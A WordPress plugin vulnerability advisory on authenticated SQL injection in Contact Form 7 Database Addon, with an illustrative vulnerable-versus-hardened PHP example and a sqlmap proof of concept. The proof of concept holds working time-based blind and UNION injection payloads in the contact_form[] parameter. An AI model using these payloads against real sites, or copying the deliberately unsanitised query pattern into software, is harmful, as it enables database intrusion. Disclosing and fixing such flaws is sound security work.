WordPress Plugin Vulnerabilities

Contact Form 7 Database Addon < 1.2.5.4 - Authenticated SQL Injections

Description

The plugin did not properly sanitise the form IDs submitted in the contact_form POST array parameter before using them in a SQL statement in the process_bulk_action() function. This could allow high-privilege users, such as admin, to perform SQL injection against the DBMS via the bulk actions delete, read and unread.

Note: Further SQL Injections have been fixed in 1.2.5.7.
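To make the defect concrete, the following PHP is a constructed illustration of the vulnerable pattern next to a hardened version. It is an added example and not the plugin's own code (the plugin's actual process_bulk_action() is not reproduced here). It assumes it runs inside WordPress (global $wpdb, absint(), current_user_can(), check_admin_referer()); the table name, the is_read column and the nonce action name are placeholders chosen for the illustration.

```php
<?php
// Added illustration, not the plugin's code. Assumes it runs inside WordPress
// (global $wpdb, absint(), current_user_can(), check_admin_referer()).
// The table name, the is_read column and the nonce action name are assumed.

// VULNERABLE PATTERN: the IDs taken from $_POST['contact_form'] are joined
// straight into the SQL string. A value such as "1 AND (SELECT SLEEP(5))"
// becomes part of the statement, which is exactly the time-based blind
// injection the advisory describes.
function demo_bulk_action_vulnerable( $action ) {
    global $wpdb;
    $table = $wpdb->prefix . 'cf7_submissions'; // assumed table name
    $ids   = isset( $_POST['contact_form'] ) ? (array) $_POST['contact_form'] : array();
    $list  = implode( ',', $ids ); // no sanitisation, no casting

    switch ( $action ) {
        case 'delete':
            return $wpdb->query( "DELETE FROM {$table} WHERE form_id IN ({$list})" );
        case 'read':
            return $wpdb->query( "UPDATE {$table} SET is_read = 1 WHERE form_id IN ({$list})" );
        case 'unread':
            return $wpdb->query( "UPDATE {$table} SET is_read = 0 WHERE form_id IN ({$list})" );
    }
    return false;
}

// HARDENED PATTERN:
//  1. capability and nonce checks (the PoC request already carries _wpnonce;
//     a nonce alone does not constrain a privileged user, so both are needed),
//  2. every ID is cast to a non-negative integer with absint() and zero or
//     empty values are dropped, so only digits ever reach the query,
//  3. the IN (...) list is built from %d placeholders and passed through
//     $wpdb->prepare(), so the DBMS never sees request-controlled SQL text,
//  4. the action name is matched against a fixed whitelist.
function demo_bulk_action_hardened( $action ) {
    global $wpdb;

    if ( ! current_user_can( 'manage_options' ) ) {
        return false;
    }
    check_admin_referer( 'bulk-contact_forms' ); // nonce action name is assumed

    $ids = isset( $_POST['contact_form'] ) ? (array) $_POST['contact_form'] : array();
    $ids = array_values( array_filter( array_map( 'absint', $ids ) ) );
    if ( empty( $ids ) ) {
        return 0;
    }

    $table        = $wpdb->prefix . 'cf7_submissions'; // assumed table name
    $placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );

    $templates = array(
        'delete' => "DELETE FROM {$table} WHERE form_id IN ({$placeholders})",
        'read'   => "UPDATE {$table} SET is_read = 1 WHERE form_id IN ({$placeholders})",
        'unread' => "UPDATE {$table} SET is_read = 0 WHERE form_id IN ({$placeholders})",
    );
    if ( ! isset( $templates[ $action ] ) ) {
        return false;
    }

    // $wpdb->prepare() accepts the values as an array; %d forces integer
    // formatting, so "1 AND (SELECT SLEEP(5))" has already become 1 by now.
    return $wpdb->query( $wpdb->prepare( $templates[ $action ], $ids ) );
}
```

The decisive change is that the ID list is typed (absint) and parameterised (%d through prepare()) before it touches the query; the capability check and the whitelist of actions close the remaining surface that a privileged-but-untrusted session could reach.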

Proof of Concept

---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: s=&_wpnonce=16a6b55ed1&contact_form[]=1 AND (SELECT 4559 FROM (SELECT(SLEEP(5)))BVdc)&action2=-1

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: s=&_wpnonce=16a6b55ed1&contact_form[]=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a7a7171,0x545942474c4e416e6864774d4c756c6f684d7569456150706b756f7a465a487173704c476b465243,0x71716b7871),NULL-- -&action2=-1
---

Affects Plugins

Fixed in 1.2.5.4

Classification

Type
SQLI

Miscellaneous

Verified
Yes

Timeline

Publicly Published
2021-01-21
Added
2021-01-21
Last Updated
2021-01-25